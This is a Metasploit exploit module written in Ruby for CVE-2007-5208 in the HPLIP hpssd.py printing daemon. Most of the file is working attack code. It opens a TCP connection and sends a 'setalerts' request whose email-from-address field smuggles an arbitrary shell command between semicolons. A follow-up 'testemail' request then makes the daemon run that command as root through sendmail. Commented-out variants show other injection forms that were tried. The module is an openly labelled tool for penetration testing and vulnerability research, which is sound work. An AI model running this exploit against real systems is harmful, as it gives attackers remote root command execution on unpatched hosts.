##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  # Plain TCP transport: provides connect/disconnect and the `sock` handle used below.
  include Msf::Exploit::Remote::Tcp

  # Module metadata for the HPLIP hpssd.py issue tracked as CVE-2007-5208 / OSVDB 41693 / BID 26054.
  # The payload is a raw command line (ARCH_CMD, PayloadType 'cmd') limited to 1024 bytes; there is a
  # single automatic target and the only registered option is RPORT, defaulting to 2207.
  #
  # @param info [Hash] module info supplied by the framework, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HPLIP hpssd.py From Address Arbitrary Command Execution',
      'Description'    => %q{
          This module exploits a command execution vulnerable in the hpssd.py
        daemon of the Hewlett-Packard Linux Imaging and Printing Project.
        According to MITRE, versions 1.x and 2.x before 2.7.10 are vulnerable.

        This module was written and tested using the Fedora 6 Linux distribution.
        On the test system, the daemon listens on localhost only and runs with
        root privileges. Although the configuration shows the daemon is to
        listen on port 2207, it actually listens on a dynamic port.

        NOTE: If the target system does not have a 'sendmail' command installed,
        this vulnerability cannot be exploited.
      },
      'Author'         => [ 'jduck' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2007-5208' ],
          [ 'OSVDB', '41693' ],
          [ 'BID', '26054' ],
          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=319921' ],
          [ 'URL', 'https://bugzilla.redhat.com/attachment.cgi?id=217201&action=edit' ]
        ],
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      # The description states the daemon runs as root on the test system.
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'    => 1024,
          'DisableNops' => true,
          'Compat'   =>
            {
              'PayloadType' => 'cmd',
              # *_perl and *_ruby work if they are installed
              # inetd isn't used on FC6/7 (xinetd is)
              # netcat doesn't have -e by default
            }
        },
      'Targets'        =>
        [
          [ 'Automatic (hplip-1.6.7-4.i386.rpm)', { } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Oct 04 2007'
    ))

    # RPORT defaults to the configured hpssd port; per the description the daemon may
    # actually bind a dynamic port, so the operator may have to override this.
    register_options(
      [
        Opt::RPORT(2207),
      ], self.class)
  end

  # Sends two newline-delimited key=value requests over one TCP connection:
  # a 'setalerts' message whose email-from-address field carries the encoded
  # command, followed by a 'testemail' message. Per the module description the
  # daemon hands that address to 'sendmail', which is where the injected command
  # is evaluated; nothing is read back from the socket, so success is not verified here.
  #
  # NOTE(review): the socket is never closed explicitly (no `disconnect` call);
  # presumably the framework's post-exploit cleanup handles it — confirm.
  def exploit
    connect

    # The 'nohup' prefix variant was tried and left commented out.
    #cmd = "nohup " + payload.encoded
    cmd = payload.encoded

    # Fixed values for the username and recipient fields; only the
    # from-address field is attacker-controlled content.
    username = 'root'
    toaddr = 'nosuchuser'

    # first setalerts
    print_status("Sending 'setalerts' request with encoded command line...")
    # Backtick form was also tried; the ';' separators are the form kept.
    msg = "username=#{username}\n" +
      "email-alerts=1\n" +
      #"email-from-address=`#{cmd}`\n" +
      "email-from-address=x;#{cmd};\n" +
      "email-to-addresses=#{toaddr}\n" +
      "msg=setalerts\n"
    sock.put(msg)

    # next, the test email command
    print_status("Sending 'testemail' request to trigger execution...")
    msg = "msg=testemail\n"
    sock.put(msg)

  end

end